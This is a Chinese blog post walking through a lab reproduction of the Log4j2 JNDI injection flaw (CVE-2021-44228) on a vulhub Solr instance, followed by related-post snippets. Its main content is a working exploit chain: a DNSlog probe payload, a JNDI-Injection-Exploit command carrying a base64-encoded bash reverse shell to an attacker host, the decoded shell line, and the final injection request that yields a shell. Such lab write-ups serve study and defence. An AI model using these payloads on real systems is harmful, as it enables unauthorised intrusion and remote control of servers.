Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)

已于 2022-04-19 16:29:26 修改
阅读量6k 收藏 3
点赞数
分类专栏: 安全渗透 文章标签: linux 安全 运维
于 2022-03-17 18:22:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43795682/article/details/123557217
版权

开启环境:

root@bt-virtual-machine:/zbt/vulhub-master/log4j/CVE-2021-44228# docker-compose up -d

Log4j2端口3839页面

http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1

 

去提交dnslog payload参数:

http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}

Dnslog中检测到信息,证明存在log4j2漏洞

 

攻击:

利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

#####192.168.29.128为kali攻击机监听地址,kali机执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI5LjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.29.128

解密为:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,bash -i >& /dev/tcp/192.168.29.128/6969 0>&1}|{base64,-d}|{bash,-i}" -A 192.168.29.128

得到rmi、ldap参数:

Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/vvl2u9
ldap://192.168.29.128:1389/vvl2u9
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.29.128:1099/xs1wkb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/qzrfe7
ldap://192.168.29.128:1389/qzrfe7

进行payload攻击:

http://192.168.29.130:8983/solr/admin/cores?action=${jndi:rmi://192.168.29.128:1099/vvl2u9}

Kali机监听端口6969获取到权限

关闭环境

张星星9527
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1466
LOG4J2(CVE-2021-44228)vulhub复现
CVE-2021-2109:通过JNDICVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1....步骤3:设定JNDI伺服器 java -cp marshals
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 850
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
最新发布
carrot11223的博客
04-29 1083
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
使用JNDI进行高级DNS查询
Zhiyu's Blog
06-15 426
import java.util.*;import javax.naming.directory.*;public class DNSLookup{ public static void main(String[] args) { try { final Hashtable env = new Hashtable(); //设定DNS Service Provider. env.put("j...
DNSlog盲注
weixin_30251587的博客
03-09 660
前言 在渗透测试中,经常遇到如下情景:   1,sql盲注   2,blind型ssrf以及xxe   3,无回显命令执行漏洞 ... dnslog盲注原理 开放的DNSlog平台: http://ceye.io/ 在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。 域名解析的过程,是由顶级域名向下逐级...
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 1940
vulhub漏洞复现练习篇
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
log4j-users-guide.pdf
01-05
Apache Log4j 2 用户指南是一份详细的中文文档,涵盖了从基本概念到高级特性的全面介绍,旨在帮助用户理解和使用这个流行的Java日志框架。以下是该文档中的关键知识点概述: 1. **简介**:Log4j是Apache软件基金会...
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升级包,内附漏洞验证方式
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3539
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
Apache_log4j2CVE-2021-44228)复现
weixin_48645404的博客
12-19 144
我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。通过DNSLog平台(http://www.dnslog.cn/)获取到域名xxx.dnslog.cn,构造payload ${jndi:ldap://http://xxx.dnslog.cn}此处kali得ip为192.168.14.131 端口设置未使用得端口 并将反弹shell进行java runtime bash 编码。端口监听到数据 并且可以进行命令执行。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2548
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Apache_Log4j2查找功能JNDI注入_CVE-2021-44228
weixin_42786460的博客
10-14 471
Apache_Log4j2查找功能JNDI注入_CVE-2021-44228
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 5298
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 971
log4j 反序列化、远程代码执行漏洞
Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)
qq_44433172的博客
06-24 1239
Apache Log4j 远程代码执行漏洞 (CVE-2021-44228)
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值